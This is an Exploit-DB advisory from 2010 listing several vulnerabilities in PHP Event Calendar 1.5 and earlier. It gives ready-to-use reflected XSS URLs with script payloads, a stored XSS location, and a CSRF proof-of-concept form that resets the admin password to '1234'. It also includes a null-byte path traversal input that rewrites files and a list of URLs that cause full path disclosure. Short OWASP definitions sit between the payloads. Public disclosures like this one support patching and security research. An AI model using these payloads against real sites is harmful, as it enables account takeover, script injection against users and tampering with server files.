PHP Event Calendar <= 1.5 - Multiple Vulnerabilities

2010-06-22T00:00:00
ID EDB-ID:13988
Type exploitdb
Reporter cp77fk4r
Modified 2010-06-22T00:00:00

Description

PHP Event Calendar. Webapps exploit for php platform

                                        
                                            # Title: PHP Event Calendar <= v1.5 Multiple Vulnerabilities
# Author: cp77fk4r | Empty0pagE[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Software Link: http://www.softcomplex.com/download.html
# Version: <= v1.5
# Tested on: Apache2+PHP5 on Win32
#
#
##[Cross Site Scripting]*
(Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web
sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed
are quite widespread and occur anywhere a web application uses input from a
user in the output it generates without validating or encoding it (OWASP))
-Reflected:
http://[SERVER]/[DIR]/cl_files/index.php (POST/Login name)
http://
[SERVER]/[DIR]/cl_files/index.php?page=a&name=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://
[SERVER]/[DIR]/cl_files/index.php?CLd=21&CLm=06&CLy=2010&name=[CALENDAR_NAME]&type=list&action=t&page=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://
[SERVER]/[DIR]/cl_files/index.php?CLd=21&CLm=06&CLy=2010&name=[CALENDAR_NAME]&type=&action=e&err='%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C'
http://
[SERVER]/[DIR]/cl_files/index.php?CLd=23&CLm=06&CLy=2010%22%3E%3Cscript%3Ealert(1)%3C/script%3E&name=[CALENDAR_NAME]&type=&action=e
#
-Permenent:
http://[SERVER]/[DIR]/cl_files/index.php?page=e
(Title; Body; Background color; Background image; Align;)
#
##[Cross Site Request Forgery]*
(CSRF is an attack which forces an end user to execute unwanted actions on a
web application in which he/she is currently authenticated. With a little
help of social engineering (like sending a link via email/chat), an attacker
may force the users of a web application to execute actions of the
attacker's choosing. A successful CSRF exploit can compromise end user data
and operation in case of normal user. If the targeted end user is the
administrator account, this can compromise the entire web application.)
(OWASP))
#
http://[SERVER]/[DIR]/cl_files/index.php?page=a
#
Change "Admin" Password PoC:
<form name=user method=post action="http://
[SERVER]/[DIR]/cl_files/index.php?page=a&name=[CALENDAR_NAME]">
<input type="hidden" name="page" value="a">
<input type=hidden value="admin" name=l class=inpt>
<input type=hidden value="1234" name=p class=inpt>
<input type=hidden value="1234" name=p2 class=inpt>
</form>

#
##[Local File Rewriting+Path Traversal with NBP]**
(A Path Traversal attack aims to access files and directories that are
stored outside the web root folder. By browsing the application, the
attacker looks for absolute links to files stored on the web server. By
manipulating variables that reference files with “dot-dot-slash (../)”
sequences and its variations, it may be possible to access arbitrary files
and directories stored on file system, including application source code,
configuration and critical system files, limited by system operational
access control. The attacker uses “../” sequences to move up to root
directory, thus permitting navigation through the file system. (OWASP))
#
http://[SERVER]/[DIR]/cl_files/index.php
"Title:" \..\..\..\..\..\..\1.txt%00
#
Will rewrite %HOMEDRIVER%\1.txt file.
#
##[FULL PATH DICSLOSURE]
(Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the
path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain
vulnerabilities, such as using the load_file() (within a SQL Injection)
query to view the page source, require the attacker to have the full path to
the file they wish to view. (OWASP))
#
-Fatal error: Call to a member function read_file()/load_item() on a
non-object:
http://[SERVER]/[DIR]/cl_files/admin.php
http://[SERVER]/[DIR]/cl_files/auth.php
http://[SERVER]/[DIR]/cl_files/edit.php
http://[SERVER]/[DIR]/cl_files/templ.php
http://[SERVER]/[DIR]/cl_files/view.php
http://[SERVER]/[DIR]/cl_files/index.php?page=a&name=cP
http://[SERVER]/[DIR]/show.php
#
-Fatal error: Call to undefined function:
http://[SERVER]/[DIR]/cl_files/property.php
http://[SERVER]/[DIR]/cl_files/user.php
#
-Fatal error: Maximum execution time of 60 seconds exceeded:
http://[SERVER]/[DIR]/?CLm[CALENDAR_NAME]=1333333337
#
-Parse error: syntax error:
http://[SERVER]/[DIR]/cl_files/data/groups.php
http://[SERVER]/[DIR]/cl_files/data/users.php
#
##[Directory Listing]
#
http://[SERVER]/[DIR]/cl_files/data/
#
*The victim must be logged in.
**The attacker must be logged in.
# [e0f]